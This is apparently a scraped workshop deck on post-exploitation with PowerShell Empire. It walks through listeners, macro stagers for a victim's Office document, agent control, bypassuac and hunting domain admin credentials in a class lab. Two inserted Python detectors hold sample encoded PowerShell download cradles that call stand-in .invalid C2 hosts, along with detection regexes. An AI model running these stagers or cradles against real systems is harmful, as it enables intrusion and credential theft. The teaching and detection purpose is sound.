@haydnjohnson
“Building an Empire”
PowerShell Goodness
http://www.slideshare.net/harmj0y/building-an-empire-with-powershell
Post Exploitation
● Have gained access
a. Via phishing
b. Via Exploit
c. Via ??
● Want to know where we are in the network
● Want to know WHO we are
● What PERMISSIONS do we have
● Getting a shell is just the beginning :)
So you have gained access - now what?
● What Box are you on?
○ IP address
○ What platform?
○ Service Pack?
● Normal User or Privileged User?
○ What permissions
○ What can you execute
● What else is out in the Abyss?
○ Network shares
○ Other boxes
○ Where are the domain admins??
Any other things we might want to know???
We want to pilfer - as quietly as possible
● As small a footprint as possible
● Use native tools
● A scripting language like bash, but for Windows?
● BATCH any good?
PowerShell - our best friend
● It is native - pretty much guaranteed to be available
● Full .NET access
● Most likely to be whitelisted
● Access to Win32 API
○ Access to Kernel
● Run things in memory!
○ Even assemble binaries
For an amazing explanation read:
http://www.exploit-monday.com/2012/08/Why-I-Choose-PowerShell.html
Empire comes to the rescue
Free open source
Power-packed!
Incorporates:
● PowerSploit
● Posh-SecMod
● PowerShell-AD-Recon
● Mimikatz
Developers:
● @harmj0y
● @enigma0x3
● Many others!
References
http://www.powershellempire.com/
Peeps to follow:
● https://twitter.com/enigma0x3
● https://twitter.com/harmj0y
● https://twitter.com/mattifestation
● https://twitter.com/obscuresec
● https://twitter.com/JosephBialek
● https://twitter.com/pyrotek3
● https://twitter.com/tifkin_
● https://twitter.com/ben0xa
● https://twitter.com/mwjcomputing
● https://github.com/leechristensen/UnmanagedPowerShell
● https://github.com/PyroTek3/PowerShell-AD-Recon
● https://github.com/darkoperator/Posh-SecMod
Many more +
Pocketful of goodies!
● Create Listeners easily
○ PowerShell command straight into CMD
○ VBA for excel Macros
○ Ducky scripts
● Agents (C2 comms) are easy to use
● Modules and more modules!
Listeners
Communicates with your agent (the thing that sits on your victim's machine)
Agents
● Are what you command to do things on your victim's machine!
● Similar to a meterpreter session? More powerful maybe?
Modules
● Numerous scripts with awesomeness
● Run situational awareness scripts
● Run Privilege escalation scripts
No more theory. Let's give this a try.
The plan
1. Install PowerShell Empire
2. Create a listener
3. Execute an Agent on Victim
4. Run modules
5. Escalate to high privileged process as Admin (bypassuac)
6. Look for other shares/boxes to get Domain Admin
a. If the class infrastructure has AD
Tutorial to Follow Part 1 - Getting Access
https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro-evading-avs/
● Covers Installation
● Receiving connection via a VBA Macro
Install Empire
Git Clone onto your Linux machine
Got Kali?
Create a Listener
“listeners” - switch to listeners mode
“options” | “info” - view options to configure
“set Name Test1” - Set a name for listener
“execute” - activates the listener
Create a macro
“usestager macro Test” - create macro for the listener named Test
“options” - ensure listener is connected
“execute” - will create a file with VBA code
Add the code from the macro into the victim's Excel/Word document.
Execute the file and receive an agent.
If there is no Excel/Word, use “usestager launcher” and copy and paste the output into CMD.
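The launcher and macro stagers above hand the target a hidden-window, encoded PowerShell one-liner that pulls code and runs it in memory, which is exactly the property the earlier "PowerShell - our best friend" slide praises. As an added example (not from this deck or from the Empire project), here is defender-side triage logic in Python that decodes `-EncodedCommand` payloads in constructed 4688-style process-creation records and flags those traits; the event fields, the sample command lines and the `c2.example.invalid` host are all constructed.

```python
"""Triage Windows process-creation records for PowerShell launcher tradecraft.

Added example, not code from the workshop deck or from Empire: reads 4688-style
process-creation events, decodes -EncodedCommand payloads and flags the traits
a launcher/macro stager exhibits (hidden window, encoded one-liner, in-memory
download-and-execute, Office parent process).
"""
import base64
import re
from dataclasses import dataclass, field


def encode_powershell_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events modelled on Event ID 4688 fields; not real host data.
# The cradle URL uses the reserved .invalid TLD so nothing here is reachable.
SAMPLE_EVENTS = [
    {   # macro-style: Office spawns a hidden, encoded PowerShell download cradle
        "id": 1,
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass -Enc "
        + encode_powershell_command(
            "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
        ),
    },
    {   # benign: an admin runs a script file from Explorer
        "id": 2,
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    },
    {   # launcher-style: pasted into CMD, unencoded but hidden and in-memory
        "id": 3,
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -w 1 -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://c2.example.invalid/l')\"",
    },
]

# powershell.exe accepts any unambiguous prefix of a switch (-e, -ec, -enc, -w, -ex ...),
# so the patterns match the prefixes rather than only the full switch names.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:in|indowstyle)?\s+(?:hidden|1)\b", re.I)
BYPASS_RE = re.compile(r"(?:^|\s)-ex(?:ec|ecutionpolicy)?\s+bypass\b", re.I)
OFFICE_PARENT_RE = re.compile(r"(?:winword|excel|powerpnt|outlook)\.exe$", re.I)
CRADLE_RE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
INMEM_RE = re.compile(r"invoke-expression|\biex\b", re.I)


@dataclass
class Finding:
    event_id: int
    reasons: list = field(default_factory=list)
    decoded: str = ""

    @property
    def severity(self) -> str:
        """Crude scoring: three or more traits together is a strong launcher signal."""
        if len(self.reasons) >= 3:
            return "high"
        return "medium" if self.reasons else "none"


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: dict) -> Finding:
    """Score one record; the decoded payload is inspected alongside the visible command line."""
    finding = Finding(event_id=event["id"])
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        finding.reasons.append("encoded-command")
        finding.decoded = decoded
    haystack = cmdline + "\n" + (decoded or "")
    if OFFICE_PARENT_RE.search(event["parent"]):
        finding.reasons.append("office-parent")
    if HIDDEN_RE.search(cmdline):
        finding.reasons.append("hidden-window")
    if BYPASS_RE.search(cmdline):
        finding.reasons.append("execution-policy-bypass")
    if CRADLE_RE.search(haystack):
        finding.reasons.append("download-cradle")
    if INMEM_RE.search(haystack):
        finding.reasons.append("in-memory-execution")
    return finding


def triage(events) -> list:
    """Return a Finding for every event that shows at least one suspicious trait."""
    return [f for f in (triage_event(e) for e in events) if f.reasons]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.severity} {f.reasons}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Command-line patterns alone are evadable, so pair this with PowerShell script block logging (Event ID 4104), which records the script after decoding and download regardless of how it was launched.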
Have now gained access
Tutorial To Follow Part 2 - Controlling your agent
https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims-machine/
Once the file is opened you should have an agent
“agents” - will take you to the listing of agents
“interact ABCDEDINDF” - select the agent to interact with.
“sysinfo” - gain information about your victim
“usemodule” <tab> - gain a list of all the awesomeness
Useful commands
● >git clone https://github.com/PowerShellEmpire/Empire.git
● >listeners
○ List & create listeners
● >usestager launcher
○ usestager <tab> to see other stagers :)
● >agents
○ >sysinfo - list system info for the box the agent is on
● >usemodule <tab>
● bypassuac <2nd listener>
Goals
Find a flag - you have local admin access and there is a flag on an open share. Find it.
Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin.
Any other fun stuff we can do?
Detailed case study:
https://enigma0x3.net/2016/01/28/an-empire-case-study/
UI5 Controls simplified - UI5con2024 presentation
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 

Empire Work shop

@haydnjohnson
Pocketful of goodies!
● Create Listeners easily
○ PowerShell command straight into CMD
○ VBA for Excel macros
○ Ducky scripts
● Agents (C2 comms) are easy to use
● Modules and more modules!
10
@haydnjohnson
Listeners
Communicate with your agent (the thing that sits on your victim's machine)
11
@haydnjohnson
Agents
● Are what you use to do things on your victim's machine!
● Similar to a Meterpreter session? More powerful, maybe?
13
@haydnjohnson
Modules
● Numerous scripts with awesomeness
● Run situational awareness scripts
● Run privilege escalation scripts
15
@haydnjohnson
No more theory. Let's give this a try.
17
@haydnjohnson
The plan
1. Install PowerShell Empire
2. Create a listener
3. Execute an agent on the victim
4. Run modules
5. Escalate to a high-privileged process as Admin (bypassuac)
6. Look for other shares/boxes to get Domain Admin
a. If the class infrastructure has AD
18
@haydnjohnson
Tutorial to Follow
Part 1 - Getting Access
https://www.cybrary.it/0p3n/powershell-empire-stagers-1-phishing-office-macro-evading-avs/
● Covers installation
● Receiving a connection via a VBA macro
19
@haydnjohnson
Install Empire
Git clone onto your Linux machine
Got Kali?
20
@haydnjohnson
Create a Listener
“listeners” - switch to listeners mode
“options” | “info” - view options to configure
“set Name Test1” - set a name for the listener
“execute” - activates the listener
21
@haydnjohnson
Create a macro
“usestager macro Test” - create a macro for the listener named Test
“options” - ensure the listener is connected
“execute” - will create a file with VBA code
Add the code from the macro into the victim's Excel/Word document.
Execute the file and receive an agent.
If there is no Excel/Word, use “usestager launcher” and copy and paste the output into CMD
22
@haydnjohnson
Tutorial To Follow
Part 2 - Controlling your agent
https://www.cybrary.it/0p3n/powershell-empire-stagers-2-controlling-victims-machine/
Opened the file - you should have an agent
“agents” - will take you to the listing of agents
“interact ABCDEDINDF” - select the agent to interact with
“sysinfo” - gain information about your victim
“usemodule” <tab> - gain a list of all the awesomeness
24
@haydnjohnson
Useful commands
● >git clone https://github.com/PowerShellEmpire/Empire.git
● >listeners
○ List & create listeners
● >usestager launcher
○ usestager <tab> to see other launchers :)
● >agents
○ >sysinfo - list system info for the box the agent is on
● >usemodule <tab>
● bypassuac <2nd listener>
25
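Both delivery paths the slides walk through (a launcher one-liner pasted into CMD, and a macro that spawns PowerShell from an Excel/Word document) leave a recognisable process-creation trail. As an added example that is not part of this deck or of the Empire project, the Python below flags such events in constructed Sysmon-style records; the image paths, flag shapes, decoded command and URL are assumptions.

```python
"""Added example: flag PowerShell launches that match the macro path (Office
parent) or the launcher path (hidden window, encoded command, download cradle).
Events are constructed to resemble Sysmon/EDR process-creation records."""
import base64
import re
from typing import List, NamedTuple, Tuple

class ProcEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Flags an interactive admin rarely types by hand. Short forms are accepted
# because PowerShell resolves unambiguous prefixes (-w 1 == -WindowStyle Hidden).
SUSPICIOUS_FLAGS = {
    "noprofile": re.compile(r"(?i)\s-nop(rofile)?\b"),
    "hidden_window": re.compile(r"(?i)\s-w(indowstyle)?\s+(1|hidden)\b"),
    "noninteractive": re.compile(r"(?i)\s-noni(nteractive)?\b"),
    "encoded": re.compile(r"(?i)\s-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})"),
}
CRADLE = re.compile(r"(?i)DownloadString|IEX|Invoke-Expression|Net\.WebClient")

def decode_encoded_command(command_line: str):
    """Return the -EncodedCommand text (base64 of UTF-16LE) or None."""
    m = SUSPICIOUS_FLAGS["encoded"].search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(event: ProcEvent) -> List[str]:
    """Reasons an event looks like a stager launch; empty list means benign."""
    reasons = []
    if not event.image.lower().endswith("powershell.exe"):
        return reasons
    if event.parent_image.lower().rsplit("\\", 1)[-1] in OFFICE:
        reasons.append("office_parent")          # macro path (slide 22)
    for name, rx in SUSPICIOUS_FLAGS.items():
        if rx.search(event.command_line):
            reasons.append(name)
    # Look for a download cradle in the raw line and in the decoded payload.
    text = event.command_line + " " + (decode_encoded_command(event.command_line) or "")
    if CRADLE.search(text):
        reasons.append("download_cradle")        # launcher path (slide 25)
    return reasons

def find_suspicious(events, min_reasons: int = 2) -> List[Tuple[ProcEvent, List[str]]]:
    return [(e, analyse(e)) for e in events if len(analyse(e)) >= min_reasons]

# Constructed sample events (assumed shapes, not captured from a real host).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.constructed.invalid/a')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\cmd.exe", PS, f"powershell -noP -sta -w 1 -enc {ENC}"),
    ProcEvent("C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", PS,
              "powershell.exe -NoP -NonI -W Hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('http://c2.constructed.invalid/b'))\""),
    ProcEvent("C:\\Windows\\explorer.exe", PS, "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
]
```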
@haydnjohnson
Goals
Find a flag - you have local admin access, and there is a flag on an open share. Find it.
Get Domain Admin credentials - you may need to ‘hunt’ for a domain admin
26
@haydnjohnson
Any other fun stuff we can do?
Detailed case study: https://enigma0x3.net/2016/01/28/an-empire-case-study/
27